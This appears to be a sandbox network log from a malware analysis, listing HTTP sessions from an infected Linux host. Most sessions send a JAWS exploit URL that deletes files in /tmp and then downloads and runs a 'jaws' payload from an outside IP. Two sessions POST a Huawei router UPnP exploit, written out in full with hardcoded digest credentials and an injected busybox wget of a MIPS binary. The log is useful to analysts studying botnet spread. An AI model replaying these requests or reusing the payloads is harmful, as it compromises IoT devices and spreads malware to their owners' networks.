                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          112192.168.2.2357854202.81.229.16980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.844789982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:06.137968063 CET322INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:05 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          113192.168.2.2341608203.170.84.9880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.853328943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:06.155003071 CET200INHTTP/1.0 400 Bad request
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                          Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          114192.168.2.2360798154.214.96.7080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.858026028 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:07.471683025 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:09.359400988 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:13.202950954 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:20.877819061 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:35.979665041 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.207268953 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          115192.168.2.2348486146.71.40.21580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.866440058 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:06.022851944 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          116192.168.2.235246849.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.984606981 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:05Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          117192.168.2.234102841.0.84.3437215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:06.080918074 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          118192.168.2.2342372104.83.91.4180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:06.101526976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:06.372483969 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:06 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:06 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 34 35 66 38 63 34 66 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 36 26 23 34 36 3b 32 63 31 62 34 36 63 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;545f8c4f&#46;1704173046&#46;2c1b46c5</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          119192.168.2.2358998156.77.130.17737215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:06.202487946 CET882OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          120192.168.2.2341634203.170.84.9880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:06.456967115 CET200INHTTP/1.0 400 Bad request
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                          Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          121192.168.2.235252649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:06.738842010 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:06Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          122192.168.2.235254249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:07.633058071 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:06Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          123192.168.2.235255449.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.401515007 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:07Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          124192.168.2.2344286170.130.22.25480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.505354881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:08.626611948 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:08 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          125192.168.2.233622898.123.179.9880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.556843042 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          126192.168.2.235379450.199.186.2580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.558341026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:08.846210003 CET115INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          Connection: close
                                                          AuthInfo:


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          127192.168.2.235134284.247.28.15580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:08.653605938 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:08.922239065 CET932INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 681
                                                          date: Tue, 02 Jan 2024 05:24:08 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
